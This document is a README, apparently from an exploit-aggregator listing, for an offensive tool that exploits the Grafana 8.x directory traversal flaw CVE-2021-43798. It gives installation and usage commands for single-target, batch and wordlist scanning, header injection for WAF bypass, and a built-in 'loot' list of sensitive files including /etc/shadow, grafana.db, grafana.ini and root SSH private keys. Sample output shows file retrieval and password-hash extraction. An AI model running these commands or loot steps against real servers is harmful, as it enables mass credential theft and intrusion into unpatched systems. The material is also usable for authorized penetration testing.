Share
## https://sploitus.com/exploit?id=C745DD53-7AE4-5A94-B669-C401DB0C0BAB
# GrafTraverse - CVE-2021-43798 MiNi Exploitation Framework


  
  
  


> **Command-line automation tool for authorized security testing of Grafana Directory Traversal (CVE-2021-43798).**

---

## Overview

[![Banner](https://i.imgur.com/QBON6GU.png)](Banner )

**CVE-2021-43798** is an unauthenticated directory traversal vulnerability in Grafana 8.x that allows attackers to read arbitrary files on the underlying filesystem via the `/public/plugins/` endpoint. The root cause is improper path sanitization on plugin asset requests, enabling `../` sequences to escape the intended directory.

**GrafTraverse** is a complete rewrite of the original proof-of-concept. It fixes critical request-handling bugs, adds multi-threaded batch scanning, automatic plugin discovery, credential extraction, and structured reporting โ€” making it a production-grade tool for red teams and penetration testers.

---

## Features

| Feature | Description |
|---------|-------------|
| **Multi-Plugin Brute-Force** | Automatically probes 40+ built-in plugins to find a vulnerable path |
| **Interactive Mode** | Menu-driven single-target exploitation with live file preview |
| **Batch Mode** | Concurrent multi-target scanning with configurable thread workers |
| **Wordlist Mode** | Deep file enumeration using custom wordlists |
| **Auto Hash Extraction** | Automatically extracts PBKDF2 password hashes from downloaded `grafana.db` |
| **Structured Logging** | Export results to **JSON** and **CSV** for seamless reporting |
| **Proxy Support** | Route traffic through Burp, ZAP, or any HTTP proxy (`--proxy`) |
| **Custom Headers** | Inject arbitrary headers for WAF bypass or auth tokens (`-H`) |
| **Traversal Customization** | Override default traversal depth for non-standard environments (`--depth`) |
| **Smart Filtering** | Eliminates false-positives by rejecting plugin JS/CSS/HTML responses |
| **Zero Dependencies** | Only requires `requests` (pre-installed on Kali / Parrot) |

---

## Installation

```bash
# Clone the repository
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# Ensure requests is available (it ships with Kali)
pip3 install requests

# Make executable
chmod +x GrafTraverse.py
```

---

## Usage

GrafTraverse uses a **subcommand-based CLI**. All commands support `--help`.

### 1. Interactive Single Target

Launch the interactive menu against one host:

```bash
python3 GrafTraverse.py single -u http://IP:PORT
```

```
============================================================
 INTERACTIVE MODE
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. Custom path
 5. Full automated loot
 6. Scan plugins
 7. Exit
============================================================
```

### 2. Plugin Scan

Quickly identify which plugin endpoint is vulnerable without exploitation:

```bash
python3 GrafTraverse.py scan -u http://target:PORT
```

### 3. Batch Scanning

Load targets from a file and process them concurrently:

```bash
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv
```

**`targets.txt` format:**
```
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# Lines starting with # are ignored
```

### 4. Wordlist Enumeration

Feed a custom file list for deep traversal:

```bash
python3 GrafTraverse.py single -u http://target:3000   --wordlist sensitive_files.txt   --output-dir ./loot   --json log.json
```

### 5. Proxy & Custom Headers

Route through Burp Suite and add custom headers:

```bash
python3 GrafTraverse.py single -u http://target:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."
```

---

## Command Reference

### `single`
| Flag | Description |
|------|-------------|
| `-u, --url` | Target URL (required) |
| `--no-download` | View-only mode, do not save files |
| `-t, --timeout` | Request timeout in seconds (default: 10) |
| `--proxy` | HTTP/HTTPS proxy URL |
| `-H, --header` | Custom header (repeatable) |
| `--depth` | Traversal string (default: `../../../../../../../../`) |
| `--output-dir` | Directory to save retrieved files |
| `--json` | Append results to JSON log file |
| `--csv` | Append results to CSV log file |
| `--wordlist` | File containing paths to enumerate |
| `--plugin` | Force a specific plugin name |

### `batch`
| Flag | Description |
|------|-------------|
| `-l, --list` | File with target URLs (required) |
| `--workers` | Concurrent threads (default: 5) |
| *(all `single` flags supported)* |

### `scan`
| Flag | Description |
|------|-------------|
| `-u, --url` | Target URL (required) |
| *(all network flags supported)* |

---

## Example Output

### Successful File Retrieval
```
[+] Output: 20260526_GrafTraverse
[*] Testing: /etc/passwd (via alertlist)
[+] SUCCESS: /etc/passwd (1874 bytes)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd
```

### Grafana DB Hash Extraction
```
[*] Testing: /var/lib/grafana/grafana.db (via alertlist)
[+] SUCCESS: /var/lib/grafana/grafana.db (98304 bytes)
[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extracted 3 password hashes:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...
```

---

## Target Files (Automated Loot)

The built-in loot sequence attempts to retrieve the following files in order:

| File | Type | Sensitivity |
|------|------|-------------|
| `/etc/passwd` | Text | User enumeration |
| `/etc/shadow` | Text | Password hashes (rarely readable) |
| `/etc/hosts` | Text | Network topology |
| `/etc/hostname` | Text | Host identification |
| `/etc/grafana/grafana.ini` | Text | Grafana secrets & DB credentials |
| `/var/lib/grafana/grafana.db` | Binary | SQLite DB with user hashes & API keys |
| `/var/log/grafana/grafana.log` | Text | Operational intelligence |
| `/root/.ssh/id_rsa` | Text | SSH private key |
| `/root/.ssh/authorized_keys` | Text | Key-based access mapping |
| `/proc/self/environ` | Text | Process environment variables |
| `/proc/self/cmdline` | Text | Process arguments |
| `/proc/version` | Text | Kernel version |
| `/proc/mounts` | Text | Filesystem layout |
| `/etc/os-release` | Text | OS identification |
| `/etc/issue` | Text | OS identification |
| `/etc/crontab` | Text | Scheduled tasks |
| `/etc/resolv.conf` | Text | DNS configuration |

---

## Affected Versions

- Grafana **8.0.0** through **8.3.0**
- Patched in **8.3.1** and **7.5.12**